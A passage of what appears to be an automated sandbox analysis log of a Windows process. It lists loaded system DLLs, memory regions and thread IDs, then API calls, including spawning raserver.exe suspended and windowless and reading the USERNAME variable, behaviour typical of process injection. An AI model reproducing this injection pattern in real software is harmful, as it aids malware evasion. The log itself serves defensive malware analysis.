"\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 893 start_va = 0x7ff8800a0000 end_va = 0x7ff8800c9fff monitored = 0 entry_point = 0x7ff8800a8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 894 start_va = 0x7ff880480000 end_va = 0x7ff880573fff monitored = 0 entry_point = 0x7ff88048a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 895 start_va = 0x7ff8806f0000 end_va = 0x7ff8806fbfff monitored = 0 entry_point = 0x7ff8806f27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 896 start_va = 0x7ff8807d0000 end_va = 0x7ff880800fff monitored = 0 entry_point = 0x7ff8807d7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 897 start_va = 0x7ff880830000 end_va = 0x7ff8808a9fff monitored = 0 entry_point = 0x7ff880851a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 898 start_va = 0x7ff8808f0000 end_va = 0x7ff880923fff monitored = 0 entry_point = 0x7ff88090ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 899 start_va = 0x7ff880930000 end_va = 0x7ff880939fff monitored = 0 entry_point = 0x7ff880931830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 900 start_va = 0x7ff880a40000 end_va = 0x7ff880a5efff monitored = 0 entry_point = 0x7ff880a45d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 901 start_va = 0x7ff880bb0000 end_va = 0x7ff880c0bfff monitored = 0 entry_point = 0x7ff880bc6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 902 start_va = 0x7ff880c60000 end_va = 0x7ff880c76fff monitored = 0 entry_point = 0x7ff880c679d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 903 start_va = 0x7ff880d80000 end_va = 0x7ff880d8afff monitored = 0 entry_point = 0x7ff880d819a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 904 start_va = 0x7ff880e10000 end_va = 0x7ff880e49fff monitored = 0 entry_point = 0x7ff880e18d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 905 start_va = 0x7ff880e50000 end_va = 0x7ff880e76fff monitored = 0 entry_point = 0x7ff880e60aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 906 start_va = 0x7ff880f60000 end_va = 0x7ff880f8cfff monitored = 0 entry_point = 0x7ff880f79d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 907 start_va = 0x7ff8810f0000 end_va = 0x7ff881145fff monitored = 0 entry_point = 0x7ff881100bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 908 start_va = 0x7ff881170000 end_va = 0x7ff881198fff monitored = 0 entry_point = 0x7ff881184530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 909 start_va = 0x7ff8811a0000 end_va = 0x7ff881238fff monitored = 0 entry_point = 0x7ff8811cf4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 910 start_va = 0x7ff8812e0000 end_va = 0x7ff88132afff monitored = 0 entry_point = 0x7ff8812e35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 911 start_va = 0x7ff881330000 end_va = 0x7ff88133efff monitored = 0 entry_point = 0x7ff881333210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 912 start_va = 0x7ff881340000 end_va = 0x7ff881353fff monitored = 0 entry_point = 0x7ff8813452e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 913 start_va = 0x7ff881360000 end_va = 0x7ff88136ffff monitored = 0 entry_point = 0x7ff8813656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 914 start_va = 0x7ff881370000 end_va = 0x7ff8813b2fff monitored = 0 entry_point = 0x7ff881384b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 915 start_va = 0x7ff881450000 end_va = 0x7ff881616fff monitored = 0 entry_point = 0x7ff8814adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 916 start_va = 0x7ff881620000 end_va = 0x7ff881c63fff monitored = 0 entry_point = 0x7ff8817e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 917 start_va = 0x7ff881c70000 end_va = 0x7ff881d24fff monitored = 0 entry_point = 0x7ff881cb22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 918 start_va = 0x7ff881d50000 end_va = 0x7ff881db9fff monitored = 0 entry_point = 0x7ff881d86d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 919 start_va = 0x7ff881e70000 end_va = 0x7ff881ec4fff monitored = 0 entry_point = 0x7ff881e87970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 920 start_va = 0x7ff881ed0000 end_va = 0x7ff8820b7fff monitored = 0 entry_point = 0x7ff881efba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 921 start_va = 0x7ff8820c0000 end_va = 0x7ff882215fff monitored = 0 entry_point = 0x7ff8820ca8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 922 start_va = 0x7ff882220000 end_va = 0x7ff8822bcfff monitored = 0 entry_point = 0x7ff8822278a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 923 start_va = 0x7ff8822c0000 end_va = 0x7ff88253cfff monitored = 0 entry_point = 0x7ff882394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 924 start_va = 0x7ff882550000 end_va = 0x7ff8825aafff monitored = 0 entry_point = 0x7ff8825638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 925 start_va = 0x7ff8825b0000 end_va = 0x7ff883b0efff monitored = 0 entry_point = 0x7ff8827111f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 926 start_va = 0x7ff883b10000 end_va = 0x7ff883b7efff monitored = 0 entry_point = 0x7ff883b35f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 927 start_va = 0x7ff883b80000 end_va = 0x7ff883beafff monitored = 0 entry_point = 0x7ff883b990c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 928 start_va = 0x7ff883bf0000 end_va = 0x7ff883d0bfff monitored = 0 entry_point = 0x7ff883c302b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 929 start_va = 0x7ff883ec0000 end_va = 0x7ff884019fff monitored = 0 entry_point = 0x7ff883f038e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 930 start_va = 0x7ff8841b0000 end_va = 0x7ff884256fff monitored = 0 entry_point = 0x7ff8841bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 931 start_va = 0x7ff8842c0000 end_va = 0x7ff884402fff monitored = 0 entry_point = 0x7ff8842e8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 932 start_va = 0x7ff884410000 end_va = 0x7ff8844d0fff monitored = 0 entry_point = 0x7ff884430da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 933 start_va = 0x7ff8844f0000 end_va = 0x7ff884918fff monitored = 0 entry_point = 0x7ff884518740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 934 start_va = 0x7ff884920000 end_va = 0x7ff8849c6fff monitored = 0 entry_point = 0x7ff8849358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 935 start_va = 0x7ff8849d0000 end_va = 0x7ff884a0afff monitored = 0 entry_point = 0x7ff8849d12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 936 start_va = 0x7ff884a10000 end_va = 0x7ff884b95fff monitored = 0 entry_point = 0x7ff884a5ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 937 start_va = 0x7ff884ba0000 end_va = 0x7ff884ba7fff monitored = 0 entry_point = 0x7ff884ba1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 938 start_va = 0x7ff884bb0000 end_va = 0x7ff884c01fff monitored = 0 entry_point = 0x7ff884bbf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 939 start_va = 0x7ff884c10000 end_va = 0x7ff884cbcfff monitored = 0 entry_point = 0x7ff884c281a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 940 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 944 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 973 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 974 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 975 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1036 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1150 start_va = 0x100f0000 end_va = 0x10ab3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000100f0000" filename = "" Region: id = 1155 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1156 start_va = 0x9ff0000 end_va = 0xa162fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009ff0000" filename = "" Region: id = 1452 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1455 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1456 start_va = 0x10ac0000 end_va = 0x10b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ac0000" filename = "" Region: id = 1457 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1458 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1459 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1460 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1461 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1464 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1465 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1466 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1467 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1468 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1469 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1472 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1473 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1474 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1475 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1476 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1477 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1478 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1479 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1480 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1481 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1482 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1483 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1484 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1485 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1486 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1538 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1539 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1540 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1541 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1542 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1543 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1544 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1545 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1546 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1547 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1548 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1549 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1707 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1708 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1709 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1710 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1711 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1712 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1917 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2018 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2122 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2276 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2380 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2482 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2739 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2841 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2945 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3269 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3282 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3291 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3298 start_va = 0x7ff879c90000 end_va = 0x7ff879cf6fff monitored = 0 entry_point = 0x7ff879c963e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3307 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3318 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3331 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3338 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3339 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3348 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3353 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3486 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3503 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3514 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3516 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3524 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3541 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3554 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3565 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3978 start_va = 0x99f0000 end_va = 0x9eeefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000099f0000" filename = "" Region: id = 4267 start_va = 0x10b40000 end_va = 0x10bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010b40000" filename = "" Region: id = 4268 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4269 start_va = 0x10c40000 end_va = 0x10cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c40000" filename = "" Region: id = 4270 start_va = 0x10cc0000 end_va = 0x10d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010cc0000" filename = "" Thread: id = 11 os_tid = 0x9e8 Thread: id = 12 os_tid = 0x1360 Thread: id = 13 os_tid = 0xc40 Thread: id = 14 os_tid = 0xbec Thread: id = 15 os_tid = 0x9b0 Thread: id = 16 os_tid = 0x3c0 Thread: id = 17 os_tid = 0xc14 Thread: id = 18 os_tid = 0xc18 Thread: id = 19 os_tid = 0xec0 Thread: id = 20 os_tid = 0xaac Thread: id = 21 os_tid = 0x824 Thread: id = 22 os_tid = 0x270 Thread: id = 23 os_tid = 0x7e8 Thread: id = 24 os_tid = 0x828 Thread: id = 25 os_tid = 0xbf4 Thread: id = 26 os_tid = 0xbf0 Thread: id = 27 os_tid = 0xbb0 Thread: id = 28 os_tid = 0x908 Thread: id = 29 os_tid = 0x848 Thread: id = 30 os_tid = 0x624 Thread: id = 31 os_tid = 0x488 Thread: id = 32 os_tid = 0x7fc Thread: id = 33 os_tid = 0x7f8 Thread: id = 34 os_tid = 0x7f4 Thread: id = 35 os_tid = 0x7d0 Thread: id = 36 os_tid = 0x7bc Thread: id = 37 os_tid = 0x7b8 Thread: id = 38 os_tid = 0x7b4 Thread: id = 39 os_tid = 0x7b0 Thread: id = 40 os_tid = 0x7ac Thread: id = 41 os_tid = 0x7a0 Thread: id = 42 os_tid = 0x79c Thread: id = 43 os_tid = 0x794 Thread: id = 44 os_tid = 0x790 Thread: id = 45 os_tid = 0x78c Thread: id = 46 os_tid = 0x788 Thread: id = 47 os_tid = 0x784 Thread: id = 48 os_tid = 0x780 Thread: id = 49 os_tid = 0x778 Thread: id = 50 os_tid = 0x774 Thread: id = 51 os_tid = 0x770 Thread: id = 52 os_tid = 0x760 Thread: id = 53 os_tid = 0x75c Thread: id = 54 os_tid = 0x758 Thread: id = 55 os_tid = 0x754 Thread: id = 56 os_tid = 0x74c [0105.137] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\raserver.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xcf928*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xcf900, hNewToken=0x0 | out: lpProcessInformation=0xcf900*(hProcess=0x11bc, hThread=0x1f60, dwProcessId=0x700, dwThreadId=0xf20), hNewToken=0x0) returned 1 [0121.481] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xcf590 | out: HeapArray=0xcf590*=0x4b0000) returned 0x6 [0121.489] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x0, Size=0x3da0) returned 0x878f370 [0121.502] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xcf370 | out: Value="RDhJ0CNFevzX") returned 0x0 [0121.540] RtlIntegerToChar (in: Value=0x748, Base=0x0, Length=0x20, String=0xcf950 | out: String="1864") returned 